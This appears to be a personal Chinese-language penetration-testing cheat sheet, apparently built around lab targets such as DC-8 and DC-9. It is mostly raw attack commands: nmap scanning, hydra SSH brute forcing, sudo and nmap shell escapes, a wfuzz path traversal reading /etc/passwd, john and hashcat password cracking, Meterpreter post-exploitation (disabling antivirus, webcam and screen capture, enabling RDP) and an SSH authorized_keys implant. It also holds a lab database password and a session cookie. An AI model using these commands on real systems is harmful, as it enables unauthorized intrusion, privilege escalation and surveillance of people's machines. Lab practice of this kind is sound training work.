nmap -sP 192.168.37.1/24
nmap -p 1-65535 -A 192.168.37.132
nmap -sC -sS 192.168.37.132 -oA dancing
jdk自带
keytool导出ssl证书内容
以 jens 执行 jens 中的 backups.sh 文件
sudo -u jens /home/jens/backups.sh
写入文件
echo "/bin/bash" >> /home/jens/backups.sh
下载文件
wget http://192.168.37.128/xxxx.xx
执行脚本
./44444.sh xxxxx
脚本格式转换
dos2unix filename
设置所有人可以读写及执行
chmod 777 file (等价于 chmod u=rwx,g=rwx,o=rwx file 或 chmod a=rwx file)
设置拥有者可读写,其他人不可读写执行
chmod 600 file (等价于 chmod u=rw,g=---,o=--- file 或 chmod u=rw,go-rwx file )
hydra爆破ssh
hydra -L DC-9_usernames.txt -P DC-9_passwords.txt 192.168.37.132 ssh
-f 爆到停
-t 线程
ffmpeg -i LeafsNewSong.mp3 -an -vcodec copy cover.png 提取封面
反弹语
python -c "import pty; pty.spawn('/bin/bash')"
cat -A 查看详情信息
dos 格式结尾 ^M$
unix 格式结尾 $
nmap提权
echo 'os.execute("/bin/bash")' > shell
sudo nmap --script=shell
多次访问 IP
for x in 7469 8475 9842 22;do nc 192.168.37.132 $x;done
ssh 用户名@192.168.37.132
ssh -p 21046 player@47.93.122.177
python -m SimpleHTTPServer 8080
python -m http.server xxx
mysql -u用户名 -p密码
mysql -udbuser -pR0ck3t
-u 和 -p 后面跟着的中文,不能有空格
2> 错误输出
/dev/null是一个特殊的设备文件,这个文件接收到的任何数据都会被丢弃。
openssl passwd -1 -salt Pai 123456
passwd 生成密码
-1 MD5模式
-salt 插入随机数
wpscan --url http://wordy -e u
-e 列举--enumerate
u 所列用户名长度,默认1-10
cewl 爬密码本
cewl http://192.168.37.133/ > xxx.txt
john 散列碰撞
john --wordlist=/usr/share/john/password.lst --rules DC-8_passwd_un.txt
sudo -l
ls -la
cat -A 查看脚本尾
dos 格式结尾 ^M$,unix 格式结尾 $
droopescan 扫 cms 版本、cms 页面用户名
droopescan scan wordpress -u http://192.168.37.133 -e a
wfuzz 模糊测试:
wfuzz --hw 121(参数) -b "PHPSESSID=4jbkh83u8gdeaqrg0rng8hh6ru" -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.37.132/addrecord.php?FUZZ=../../../../../../../../../etc/passwd
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.37.133/index.php?FUZZ
响应 响应行xL 响应单词数xW 响应字符xCh
加入 --hl (隐藏具有相同的 50 行数的响应)
同样有 --hc/hw
VPS 公网服务器 阿里云
curl 访问网页整理内容
ps 查看进程
pwd 查看当前处于目标机的那个目录
route 查看完整网络设置
getlwd 查看当前目录
getpid 查看当前进程号
getuid 查看当前权限
sysinfo 查看系统信息
getsystem 自动提权
webcam snap 抓取摄像头的照片
load espia; screengrab 抓取目标机的屏幕截图
run post/windows/gather/checkvm 查看目标机是否为虚拟机
run post/windows/manage/killav 关闭杀毒软件
run post/windows/gather/enum_applications 查看当前应用程序
run post/windows/gather/enum_logged_on_users 列举当前登录的用户
run post/windows/manage/enable_rdp 启动远程桌面协议
upload /root/45010 /tmp/45010 将攻击机的文件上传靶机
编译脚本
gcc xxxxx.c -o xxxxx
暴力破解6位未知字符,加密类型为MD5的hashcat命令
hashcat -m 0 -a 3 hashs_md5.txt ?a?a?a?a?a?a
vardump();
scandir()
file_get_contents()
使用Nmap的NSE脚本查看对方是否开启T3协议
nmap -n -v -p 7001,7002 192.168.37.137 --script=weblogic-t3-info
切换java版本
update-alternatives --config java
ssh 公钥私钥文件利用
cp id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh
dirb http://192.168.37.133 -X .php,.txt,.py,.zip